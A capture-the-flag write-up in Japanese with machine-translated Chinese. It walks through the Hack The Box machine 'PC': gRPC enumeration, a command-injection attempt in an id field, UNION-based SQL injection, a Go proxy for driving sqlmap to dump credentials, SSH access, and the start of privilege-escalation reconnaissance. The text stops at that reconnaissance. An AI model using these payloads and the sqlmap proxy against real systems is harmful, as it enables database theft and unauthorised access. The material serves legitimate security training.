【Hack The Box】PC【WriteUp】

WriteUp 7个月前 admin
86 0 0

初めに 首先

どうも、クソ雑魚のなんちゃてエンジニアです。 嘿,我是杂鱼的工程师。
本記事は Hack The Box(以下リンク参照) の「PC」にチャレンジした際の WriteUp になります。
本文是当您在Hack The Box中尝试“PC”时的文章(见下面的链接)。

※以前までのツールの使い方など詳細を書いたものではないのでご了承ください。
*请注意,我之前没有写过如何使用该工具等详细信息。

※悪用するのはやめてください。あくまで社会への貢献のためにこれらの技術を使用してください。法に触れるので。
*请不要滥用它。 请仅将这些技术用于为社会做出贡献。 因为它触碰了法律。

Discovery 发现

ポートスキャン 端口扫描

今回はRustScanで高速スキャンしてみた。 这次,我尝试了使用RustScan进行高速扫描。

┌──(root㉿kali)-[~]
└─# rustscan -a 10.129.95.145 --top --ulimit 1500 
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
? https://admin.tryhackme.com

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 1500.
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.129.95.145:22
Open 10.129.95.145:50051
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-22 04:41 EDT
Initiating Ping Scan at 04:41
Scanning 10.129.95.145 [4 ports]
Completed Ping Scan at 04:41, 0.54s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 04:41
Completed Parallel DNS resolution of 1 host. at 04:41, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 04:41
Scanning 10.129.95.145 [2 ports]
Discovered open port 22/tcp on 10.129.95.145
Discovered open port 50051/tcp on 10.129.95.145
Completed SYN Stealth Scan at 04:41, 0.41s elapsed (2 total ports)
Nmap scan report for 10.129.95.145
Host is up, received echo-reply ttl 63 (0.43s latency).
Scanned at 2023-05-22 04:41:52 EDT for 0s

PORT      STATE SERVICE REASON
22/tcp    open  ssh     syn-ack ttl 63
50051/tcp open  unknown syn-ack ttl 63

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.19 seconds
           Raw packets sent: 6 (240B) | Rcvd: 3 (116B)

…え、50051ってなんですか?ちょっと別のPortも探ってみます。
… 50051是什么? 我也会探索另一个港口。

UDPとか…何もない…まじで?  UDP 或类似的东西… 无。。。 认真地?

-p-オプションで全Portスキャンしましたが、このRustscanの結果から変わりありませんでした。
-p- 我扫描了所有端口作为一个选项,但它没有改变这个 Rustscan 的结果。

意味が分からない。なんだこのPort。  我不知道你的意思。 这个端口是什么?

50051調査 50051调査

調べたら出てきます。このPortを使ったプロトコル。gRPCです。
如果你查一下,它就会出来。 使用此端口的协议。 gRPC 是。

此奴と会話するためのツールを探さないといけない。
我需要找到一个工具与这个人交谈。

gRPC

grpcurl 格普库尔

gRPC版のcurlってやつですね。便利そうなのでインストールしておきます。
它是 curl 的 gRPC 版本。 我会安装它,因为它看起来很方便。

┌──(root㉿kali)-[~]
└─# go install github.com/fullstorydev/grpcurl/cmd/grpcurl@latest
go: downloading github.com/fullstorydev/grpcurl v1.8.7
go: downloading github.com/jhump/protoreflect v1.12.0
go: downloading google.golang.org/grpc v1.48.0
go: downloading golang.org/x/net v0.0.0-20201021035429-f5854403a974
go: downloading google.golang.org/genproto v0.0.0-20200526211855-cb27e3aa2013
go: downloading github.com/envoyproxy/go-control-plane v0.10.2-0.20220325020618-49ff273808a1
go: downloading golang.org/x/sys v0.0.0-20210119212857-b64e53b001e4
go: downloading github.com/cncf/xds/go v0.0.0-20211011173535-cb28da3451f1
go: downloading github.com/cespare/xxhash/v2 v2.1.1
go: downloading github.com/cncf/udpa/go v0.0.0-20210930031921-04548b0d99d4
go: downloading github.com/envoyproxy/protoc-gen-validate v0.1.0
go: downloading golang.org/x/text v0.3.7
go: downloading golang.org/x/oauth2 v0.0.0-20200107190931-bf48bf16ab8d
go: downloading github.com/census-instrumentation/opencensus-proto v0.2.1
go: downloading cloud.google.com/go v0.56.0

実際に通信可能か確認する。 检查是否真的可以进行通信。

┌──(root㉿kali)-[~]
└─# /root/go/bin/grpcurl -plaintext 10.129.95.145:50051 list
SimpleApp
grpc.reflection.v1alpha.ServerReflection

うん。大丈夫そう。 是的。 看起来还行。

Evans 埃文斯

上記grpcurlをリッチに対話型シェルのような感じにしたやつ。
制作上述grpcurl的家伙感觉就像一个丰富的交互式外壳。

調査段階はこっちで感覚を掴んでいこうかと思う。  在调查阶段,我想我会尝试在这里了解它。
インストールする。  安装。

┌──(root㉿kali)-[~]
└─# go install github.com/ktr0731/evans@latest
go: downloading github.com/ktr0731/evans v0.10.11
go: downloading github.com/fatih/color v1.13.0
go: downloading github.com/mattn/go-colorable v0.1.13
go: downloading github.com/hashicorp/go-version v1.6.0
go: downloading github.com/ktr0731/go-multierror v0.0.0-20171204182908-b7773ae21874
go: downloading github.com/ktr0731/go-updater v0.1.6
go: downloading github.com/pkg/errors v0.9.1
go: downloading github.com/spf13/cobra v1.6.1
go: downloading github.com/spf13/pflag v1.0.5
go: downloading github.com/tj/go-spin v1.1.0
go: downloading golang.org/x/sync v0.1.0
go: downloading github.com/mattn/go-isatty v0.0.16
go: downloading github.com/pelletier/go-toml v1.9.5
go: downloading github.com/zchee/go-xdgbasedir v1.0.3
go: downloading github.com/k0kubun/pp v3.0.1+incompatible
go: downloading github.com/spf13/viper v1.14.0
go: downloading github.com/chzyer/readline v0.0.0-20180603132655-2972be24d48e
go: downloading github.com/ktr0731/go-prompt v0.2.4
go: downloading github.com/manifoldco/promptui v0.9.0
go: downloading github.com/jhump/protoreflect v1.14.0
go: downloading google.golang.org/grpc v1.51.0
go: downloading github.com/hashicorp/errwrap v1.0.0
go: downloading github.com/google/go-github v17.0.0+incompatible
go: downloading github.com/inconshreveable/go-update v0.0.0-20160112193335-8152e7eb6ccf
go: downloading github.com/mattn/go-pipeline v0.0.0-20170920030317-cfb87a531e2b
go: downloading golang.org/x/sys v0.5.0
go: downloading github.com/golang/protobuf v1.5.2
go: downloading google.golang.org/protobuf v1.28.1
go: downloading google.golang.org/genproto v0.0.0-20221024183307-1bc688fe9f3e
go: downloading github.com/hashicorp/go-multierror v1.1.1
go: downloading github.com/ktr0731/grpc-web-go-client v0.2.8
go: downloading github.com/olekukonko/tablewriter v0.0.5
go: downloading github.com/ktr0731/go-shellstring v0.1.3
go: downloading github.com/mitchellh/go-homedir v1.1.0
go: downloading github.com/fsnotify/fsnotify v1.6.0
go: downloading github.com/mitchellh/mapstructure v1.5.0
go: downloading github.com/spf13/afero v1.9.2
go: downloading github.com/spf13/cast v1.5.0
go: downloading github.com/spf13/jwalterweatherman v1.1.0
go: downloading github.com/mattn/go-runewidth v0.0.13
go: downloading golang.org/x/net v0.7.0
go: downloading github.com/google/go-querystring v1.1.0
go: downloading go.uber.org/atomic v1.9.0
go: downloading golang.org/x/text v0.7.0
go: downloading github.com/subosito/gotenv v1.4.1
go: downloading github.com/hashicorp/hcl v1.0.0
go: downloading gopkg.in/ini.v1 v1.67.0
go: downloading github.com/magiconair/properties v1.8.6
go: downloading github.com/pelletier/go-toml/v2 v2.0.5
go: downloading gopkg.in/yaml.v3 v3.0.1
go: downloading github.com/pkg/term v1.2.0-beta.2
go: downloading github.com/rivo/uniseg v0.2.0
go: downloading github.com/gorilla/websocket v1.5.0

実際に通信が可能か確認する。 检查是否真的可以进行通信。

┌──(root㉿kali)-[~/work]
└─# /root/go/bin/evans --host 10.129.95.145 -p 50051 -r   

  ______
 |  ____|
 | |__    __   __   __ _   _ __    ___
 |  __|   \ \ / /  / _. | | '_ \  / __|
 | |____   \ V /  | (_| | | | | | \__ \
 |______|   \_/    \__,_| |_| |_| |___/

 more expressive universal gRPC client


[email protected]:50051>

大丈夫そう。 看起来还行。
※Path通してないのは面倒くさがっただけなので許してください。
*请原谅我没有通过这条路,因为这只是一个麻烦。

Collection 收集

実際にアクセスして情報を収集していく。 实际访问和收集信息。

Evansでの調査 埃文斯的研究

まずはサービス一覧を確認する。どんなメソッドがあるかも見ておこう。
首先,检查服务列表。 让我们也看看有哪些方法可用。

[email protected]:50051> show service
+-----------+--------------+---------------------+----------------------+
|  SERVICE  |     RPC      |    REQUEST TYPE     |    RESPONSE TYPE     |
+-----------+--------------+---------------------+----------------------+
| SimpleApp | LoginUser    | LoginUserRequest    | LoginUserResponse    |
| SimpleApp | RegisterUser | RegisterUserRequest | RegisterUserResponse |
| SimpleApp | getInfo      | getInfoRequest      | getInfoResponse      |
+-----------+--------------+---------------------+----------------------+

理解。それぞれのメソッドでどんなものが必要か見ていく。
理解。 让我们看看每种方法需要什么。

[email protected]:50051> desc LoginUserRequest
+----------+-------------+----------+
|  FIELD   |    TYPE     | REPEATED |
+----------+-------------+----------+
| password | TYPE_STRING | false    |
| username | TYPE_STRING | false    |
+----------+-------------+----------+

[email protected]:50051> desc getInfoRequest
+-------+-------------+----------+
| FIELD |    TYPE     | REPEATED |
+-------+-------------+----------+
| id    | TYPE_STRING | false    |
+-------+-------------+----------+

[email protected]:50051> desc getInfoResponse
+---------+-------------+----------+
|  FIELD  |    TYPE     | REPEATED |
+---------+-------------+----------+
| message | TYPE_STRING | false    |
+---------+-------------+----------+

じゃあ試していく。 那我就试一试。

[email protected]:50051> call LoginUser
username (TYPE_STRING) => admin
password (TYPE_STRING) => admin
{
  "message": "Your id is 834."
}

adminあるって言われる。 他们说管理员是。

[email protected]:50051> call RegisterUser
username (TYPE_STRING) => testuser
password (TYPE_STRING) => testuser
{
  "message": "Account created for user testuser!"
}

これで進めることが出来そう。ユーザ登録が出来た。 我认为我们可以继续这样做。 我能够注册为用户。
Loginしてみる!  尝试登录!

[email protected]:50051> call LoginUser --enrich
username (TYPE_STRING) => testuser
password (TYPE_STRING) => testuser
content-type: application/grpc
grpc-accept-encoding: identity, deflate, gzip

{
  "message": "Your id is 22."
}

token: b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoidGVzdHVzZXIiLCJleHAiOjE2ODQ3NjE4NTR9.R0OMI2PN0Sfd5PRpcQuTY3eey3ifESu2RMh9e_PiKVg'

code: OK
number: 0
message: ""

何やらJWTが吐き出される。とりあえずheaderにつけてみる。
一些 JWT 被吐出。 暂时,我会穿上它 header 。

[email protected]:50051> header token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoidGVzdHVzZXIiLCJleHAiOjE2ODQ3NjE4NTR9.R0OMI2PN0Sfd5PRpcQuTY3eey3ifESu2RMh9e_PiKVg

getInfoしてみる。  getInfo 试试吧。

[email protected]:50051> 
[email protected]:50051> call getInfo
id (TYPE_STRING) => 327
command call: rpc error: code = Unknown desc = Unexpected <class 'TypeError'>: 'NoneType' object is not subscriptable

Oh…適当にid入れたらエラー吐かれた。さっきのidを入れるべきでしたね。
哦。。。 当我正确输入ID时,出现错误。 我应该包括前面的 ID。

再度設定。  再度设定。

[email protected]:50051> call LoginUser --enrich
username (TYPE_STRING) => testuser
password (TYPE_STRING) => testuser
content-type: application/grpc
grpc-accept-encoding: identity, deflate, gzip

{
  "message": "Your id is 562."
}

token: b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoidGVzdHUiLCJleHAiOjE2ODQ3NzIwNzJ9.t-WhNtgQY_muLAQvf31iibh9qXqTBwD4rxBG9v0xNj8'

code: OK
number: 0
message: ""

[email protected]:50051> header token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoidGVzdHUiLCJleHAiOjE2ODQ3NzIwNzJ9.t-WhNtgQY_muLAQvf31iibh9qXqTBwD4rxBG9v0xNj8

再度getInfo実施。

[email protected]:50051> call getInfo --enrich
id (TYPE_STRING) => 562
content-type: application/grpc
grpc-accept-encoding: identity, deflate, gzip

{
  "message": "Will update soon."
}

code: OK
number: 0
message: ""

なんも出てこんのだが!? 什么都没出来!?

OS cmd Injection 操作系统 cmd 注入

おこったのでgetInfoの部分にOS cmd Injectionをしてみる。
既然发生了, getInfo 让我们在零件上进行OS cmd注入。

[email protected]:50051> call RegisterUser
username (TYPE_STRING) => testu
password (TYPE_STRING) => testu
{
  "message": "Account created for user testu!"
}

[email protected]:50051> call LoginUser --enrich
username (TYPE_STRING) => testu
password (TYPE_STRING) => testu
content-type: application/grpc
grpc-accept-encoding: identity, deflate, gzip

{
  "message": "Your id is 425."
}

token: b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoidGVzdHUiLCJleHAiOjE2ODQ3NzI0MTd9.DfVyzGde6IjLfxgin65F7aAaplqMxJ0jteB6CQtVaVo'

code: OK
number: 0
message: ""

[email protected]:50051> header token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoidGVzdHUiLCJleHAiOjE2ODQ3NzI0MTd9.DfVyzGde6IjLfxgin65F7aAaplqMxJ0jteB6CQtVaVo

[email protected]:50051> call getInfo
id (TYPE_STRING) => 425;ping -c 3 10.10.14.55
command call: rpc error: code = Unknown desc = Unexpected <class 'sqlite3.Warning'>: You can only execute one statement at a time.

出力を見るとsqlite3を使ってそうである。というわけでSQLiの方向に移行していく。
如果您查看输出,它似乎 sqlite3 正在使用. 所以我们朝着SQLi的方向前进。

Initial Access 初始访问

SQLi

恐らくエラーの内容からPythonのsqliteのexecute(SQL_query)関数を使っているみたいなので、;でクエリを終わらせて、二つ目を繋げに行くのはNGと考えられる。よってUNIONで合体させてしまう。
从错误的内容来看,您可能正在使用 Python 的 execute(SQL_query) sqlite 函数,因此以 NG 结束查询并转到连接第二个查询 ; 被认为是 NG。 因此,它将与UNION结合使用。

[email protected]:50051> call RegisterUser
username (TYPE_STRING) => aaaa
password (TYPE_STRING) => aaaa
{
  "message": "Account created for user aaaa!"
}

[email protected]:50051> call LoginUser --enrich
username (TYPE_STRING) => aaaa
password (TYPE_STRING) => aaaa
content-type: application/grpc
grpc-accept-encoding: identity, deflate, gzip

{
  "message": "Your id is 611."
}

token: b'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWFhYSIsImV4cCI6MTY4NDc4MDU0M30.l1k6g6ds9iYtAmsiIO7geihyDmlaCTZzDMHSkBOGLz4'

code: OK
number: 0
message: ""

[email protected]:50051> header token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWFhYSIsImV4cCI6MTY4NDc4MDU0M30.l1k6g6ds9iYtAmsiIO7geihyDmlaCTZzDMHSkBOGLz4

[email protected]:50051> call getInfo
id (TYPE_STRING) => 611 Union select sqlite_version();
{
  "message": "3.31.1"
}

上手くいった。これでSQLiの脆弱性があることは分かった。このDBからクレデンシャル情報を抜き出すんだろうね。sqlmap使いたいなぁ。Proxy作るかぁ…
成功了。 我们现在知道SQLi是脆弱的。 我想我要从这个数据库中提取凭据信息。 我想使用sqlmap。 你想做一个代理吗?

gRPC Proxy Tool gRPC 代理工具

GPT

全部一から作るのは面倒なのでGPTさんに土台を作成してもらう。
从头开始制作所有内容很麻烦,所以我要求 GPT 创建基金会。

gRPCなのでGoで書いてもらった。 因为它是一个 gRPC,所以我用 Go 编写了它。
また、特定のメソッドにsqlmapを飛ばすことになるんで、grpcurlを用いた疑似プロキシとしてコードを書いてもらった。純粋なProxyにするとgRPCprotoを宣言するのがとても面倒なので…
另外,由于您会跳过 sqlmap 到特定方法,因此我要求您 grpcurl 使用 . 声明 gRPC 纯 proto 代理太麻烦了,所以…

【Hack The Box】PC【WriteUp】
ある程度いいものが出来上がりました。  在某种程度上,我们创造了一些好东西。
やっぱGPTさんは凄いですね。これをちょちょいといじればToolが出来上がるわけですから。
毕竟,GPT 是惊人的。 如果您稍微调整一下,则可以创建一个工具。

Tool Modification 工具修改

レスポンスを実際のgetInfoメソッドのレスポンスに従い、ERRORのレスポンスが帰る場合はHTTP 500 errorを返すように設計し、それ以外はjsonの中身を返すように設計した。
响应旨在 HTTP 500 error 遵循 getInfo 实际方法的响应,如果响应 ERROR 返回则返回,否则返回 json 的内容。

以下が修正を加えたToolだ。  这是修改后的工具:

http2grpc.go
package main

import (
	"encoding/json"
	"log"
	"net/http"
	"os/exec"
	"strings"
)

type Request struct {
	ID string `json:"id"`
}

type Response struct {
	Message string `json:"message"`
}

const (
	hostname     = "10.129.93.227:50051" // ホスト名とポートを指定
	serviceName  = "SimpleApp"    // サービス名を指定
	methodName   = "getInfo"       // メソッド名を指定
	tokenHeader = "token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYWFhYSIsImV4cCI6MTY4NDg2MTExOX0.8dyUoaB562MTJk-wznf39-HiaVjmlwhGVtY7YRzNb2k"
	httpPort     = ":8051"           // HTTPのポート番号を指定
)

func main() {
	http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
		// GETメソッドのクエリパラメータを取得
		queryID := r.URL.Query().Get("id")

		// JSON形式のリクエストボディを作成
		reqBody, err := json.Marshal(Request{ID: queryID})
		if err != nil {
			log.Printf("Error marshaling request body: %v", err)
			http.Error(w, "Internal Server Error", http.StatusInternalServerError)
			return
		}

		// HTTPリクエストをgRPCリクエストに変換して転送する
		cmd := exec.Command("grpcurl", "--plaintext", "--rpc-header", tokenHeader, "-d", string(reqBody), hostname, serviceName+"."+methodName)
		output, err := cmd.Output()
		if err != nil {
			log.Printf("Error executing grpcurl: %v", err)
			http.Error(w, "Internal Server Error", http.StatusInternalServerError)
			return
		}

		resp := string(output)
		if strings.HasPrefix(resp, "ERROR:") {
			// エラーレスポンスの場合はそのまま返す
			http.Error(w, resp, http.StatusInternalServerError)
			return
		}

		// レスポンスをパースしてJSONの中身を取得
		var response Response
		err = json.Unmarshal([]byte(resp), &response)
		if err != nil {
			log.Printf("Error unmarshaling response body: %v", err)
			http.Error(w, "Internal Server Error", http.StatusInternalServerError)
			return
		}

		// JSONの中身をレスポンスとして返す
		w.Header().Set("Content-Type", "application/json")
		json.NewEncoder(w).Encode(response)
	})

	// HTTPサーバーを起動
	log.Println("HTTP to gRPC proxy server started on", httpPort)
	log.Fatal(http.ListenAndServe(httpPort, nil))
}

このToolを介してsqlmapを叩き込むこととする。
我们将通过此工具点击 sqlmap。

起動 起动

起動させます。以下modコマンドでGoモジュール整理して、最後に起動させます。
让它开始吧。 使用以下 mod 命令组织 Go 模块,并在最后启动它。

┌──(root㉿kali)-[~]
└─# go mod init sqlmap/grpc
┌──(root㉿kali)-[~]
└─# go mod tidy
┌──(root㉿kali)-[~]
└─# go run http2grpc.go

続いてsqlmapだ! 接下来是SQLMAP!

Credential Access 凭据访问

sqlmap

上記で立ち上げたgRPC Proxy Toolにsqlmapを叩き込んでいく。
我们将 sqlmap 锤炼到上面启动的 gRPC 代理工具中。

┌──(root㉿kali)-[~]
└─# sqlmap -u "http://localhost:8051/?id=1" --batch --level 5 --risk 3 --dbms=sqlite --dump
        ___
       __H__                                                                                                                                                
 ___ ___[)]_____ ___ ___  {1.7.2#stable}                                                                                                                    
|_ -| . [']     | .'| . |                                                                                                                                   
|___|_  [)]_|_|_|__,|  _|                                                                                                                                   
      |_|V...       |_|   https://sqlmap.org                                                                                                                

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:13:44 /2023-05-23/

[10:13:44] [INFO] testing connection to the target URL
[10:13:46] [INFO] testing if the target URL content is stable
[10:13:47] [INFO] target URL content is stable
[10:13:47] [INFO] testing if GET parameter 'id' is dynamic
[10:13:49] [WARNING] GET parameter 'id' does not appear to be dynamic
[10:13:50] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[10:13:51] [INFO] testing for SQL injection on GET parameter 'id'
[10:13:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:14:08] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --code=200)
[10:14:08] [INFO] testing 'Generic inline queries'
[10:14:10] [INFO] testing 'SQLite inline queries'
[10:14:12] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query - comment)'
[10:14:12] [WARNING] time-based comparison requires larger statistical model, please wait.............. (done)                                             
[10:14:37] [INFO] testing 'SQLite > 2.0 stacked queries (heavy query)'
[10:14:39] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query)'
[10:14:43] [INFO] testing 'SQLite > 2.0 OR time-based blind (heavy query)'
[10:14:47] [INFO] testing 'SQLite > 2.0 AND time-based blind (heavy query - comment)'
[10:14:51] [INFO] testing 'SQLite > 2.0 OR time-based blind (heavy query - comment)'
[10:15:01] [INFO] testing 'SQLite > 2.0 time-based blind - Parameter replace (heavy query)'
[10:15:05] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[10:15:05] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[10:15:10] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[10:15:18] [INFO] target URL appears to have 1 column in query
[10:15:22] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 47 HTTP(s) requests:

...省略

結果としてUser名とPasswordが分かった!
结果,我找到了用户名和密码!

【Hack The Box】PC【WriteUp】
SSH接続すればログインできます。  您可以通过建立 SSH 连接来登录。
これでユーザ権限奪取できました。  您现在已获得用户权限。

Privilege Escalation 权限提升

調査 调査

sudo -l 须藤 -l

No Passwordで行けるか確認。 看看你是否可以使用无密码。

sau@pc:~$ sudo -l
[sudo] password for sau: 
Sorry, user sau may not run sudo on localhost.

無理でした。 这是不可能的。

pspy

pspyの実行ファイルを以下のサイトから入手。64bit版をダウンロードしましょう。
从以下站点获取 PSPY 可执行文件。 下载 64 位版本。

┌──(root㉿kali)-[~/work]
└─# wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64  

実行する。 执行。

sau@pc:~$ chmod +x ./pspy64 
sau@pc:~$ ./pspy64 
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2023/05/23 14:32:51 CMD: UID=1001  PID=1977   | ./pspy64 
2023/05/23 14:32:51 CMD: UID=0     PID=1976   | 
2023/05/23 14:32:51 CMD: UID=0     PID=1936   | 
2023/05/23 14:32:51 CMD: UID=1001  PID=1925   | -bash 
2023/05/23 14:32:51 CMD: UID=1001  PID=1919   | sshd: sau@pts/0      
2023/05/23 14:32:51 CMD: UID=0     PID=1818   | 
2023/05/23 14:32:51 CMD: UID=1001  PID=1815   | (sd-pam) 
2023/05/23 14:32:51 CMD: UID=1001  PID=1814   | /lib/systemd/systemd --user 
2023/05/23 14:32:51 CMD: UID=0     PID=1786   | sshd: sau [priv]     
2023/05/23 14:32:51 CMD: UID=0     PID=1599   | 
2023/05/23 14:32:51 CMD: UID=0     PID=1522   | 
2023/05/23 14:32:51 CMD: UID=0     PID=1411   | 
2023/05/23 14:32:51 CMD: UID=0     PID=1368   | 
2023/05/23 14:32:51 CMD: UID=0     PID=1045   | /sbin/agetty -o -p -- \u --noclear tty1 linux 
2023/05/23 14:32:51 CMD: UID=1     PID=1037   | /usr/sbin/atd -f 
2023/05/23 14:32:51 CMD: UID=0     PID=1034   | /usr/sbin/cron -f 
2023/05/23 14:32:51 CMD: UID=0     PID=1031   | sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups 
2023/05/23 14:32:51 CMD: UID=0     PID=1018   | /usr/bin/python3 /usr/local/bin/pyload 
2023/05/23 14:32:51 CMD: UID=0     PID=1013   | /usr/bin/python3 /opt/app/app.py 
2023/05/23 14:32:51 CMD: UID=101   PID=954    | /lib/systemd/systemd-resolved 
2023/05/23 14:32:51 CMD: UID=0     PID=835    | /usr/sbin/ModemManager 
2023/05/23 14:32:51 CMD: UID=0     PID=808    | /usr/lib/udisks2/udisksd 
2023/05/23 14:32:51 CMD: UID=0     PID=807    | /lib/systemd/systemd-logind 
2023/05/23 14:32:51 CMD: UID=0     PID=806    | /usr/lib/snapd/snapd 
2023/05/23 14:32:51 CMD: UID=104   PID=805    | /usr/sbin/rsyslogd -n -iNONE 
2023/05/23 14:32:51 CMD: UID=0     PID=804    | /usr/lib/policykit-1/polkitd --no-debug 
2023/05/23 14:32:51 CMD: UID=0     PID=803    | /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers 
2023/05/23 14:32:51 CMD: UID=0     PID=801    | /usr/sbin/irqbalance --foreground 
2023/05/23 14:32:51 CMD: UID=103   PID=796    | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only 
2023/05/23 14:32:51 CMD: UID=0     PID=794    | /usr/lib/accountsservice/accounts-daemon 
2023/05/23 14:32:51 CMD: UID=0     PID=774    | 
2023/05/23 14:32:51 CMD: UID=0     PID=756    | /sbin/dhclient -1 -4 -v -i -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -I -df /var/lib/dhcp/dhclient6.eth0.leases eth0                                                                                                                            
2023/05/23 14:32:51 CMD: UID=0     PID=730    | /usr/bin/vmtoolsd 
2023/05/23 14:32:51 CMD: UID=0     PID=729    | /usr/bin/VGAuthService 
2023/05/23 14:32:51 CMD: UID=0     PID=709    | /sbin/auditd 
2023/05/23 14:32:51 CMD: UID=0     PID=690    | 
2023/05/23 14:32:51 CMD: UID=0     PID=689    | 
2023/05/23 14:32:51 CMD: UID=0     PID=688    | 
2023/05/23 14:32:51 CMD: UID=0     PID=678    | /sbin/multipathd -d -s 
2023/05/23 14:32:51 CMD: UID=0     PID=677    | 
2023/05/23 14:32:51 CMD: UID=0     PID=676    | 
2023/05/23 14:32:51 CMD: UID=0     PID=675    | 
2023/05/23 14:32:51 CMD: UID=0     PID=674    | 
2023/05/23 14:32:51 CMD: UID=100   PID=525    | /lib/systemd/systemd-networkd 
2023/05/23 14:32:51 CMD: UID=0     PID=506    | /lib/systemd/systemd-udevd 
2023/05/23 14:32:51 CMD: UID=0     PID=486    | bpfilter_umh 
2023/05/23 14:32:51 CMD: UID=0     PID=463    | /lib/systemd/systemd-journald 
2023/05/23 14:32:51 CMD: UID=0     PID=439    | 
2023/05/23 14:32:51 CMD: UID=0     PID=403    | 
2023/05/23 14:32:51 CMD: UID=0     PID=402    | 
2023/05/23 14:32:51 CMD: UID=0     PID=359    | 
2023/05/23 14:32:51 CMD: UID=0     PID=331    | 
2023/05/23 14:32:51 CMD: UID=0     PID=329    | 
2023/05/23 14:32:51 CMD: UID=0     PID=328    | 
2023/05/23 14:32:51 CMD: UID=0     PID=299    | 
2023/05/23 14:32:51 CMD: UID=0     PID=298    | 
2023/05/23 14:32:51 CMD: UID=0     PID=297    | 
2023/05/23 14:32:51 CMD: UID=0     PID=296    | 
2023/05/23 14:32:51 CMD: UID=0     PID=295    | 
2023/05/23 14:32:51 CMD: UID=0     PID=294    | 
2023/05/23 14:32:51 CMD: UID=0     PID=293    | 
2023/05/23 14:32:51 CMD: UID=0     PID=292    | 
2023/05/23 14:32:51 CMD: UID=0     PID=291    | 
2023/05/23 14:32:51 CMD: UID=0     PID=290    | 
2023/05/23 14:32:51 CMD: UID=0     PID=289    | 
2023/05/23 14:32:51 CMD: UID=0     PID=288    | 
2023/05/23 14:32:51 CMD: UID=0     PID=287    | 
2023/05/23 14:32:51 CMD: UID=0     PID=286    | 
2023/05/23 14:32:51 CMD: UID=0     PID=285    | 

...省略

上記結果を注視すれば気になるコマンドがRoot権限で実行されていることが見える。
如果您注意上述结果,您可以看到您感兴趣的命令正在以 root 权限执行。

2023/05/23 14:32:51 CMD: UID=0 PID=1018 | /usr/bin/python3 /usr/local/bin/pyload
上記の此奴だ。pyload…気になるので調べてみよう。
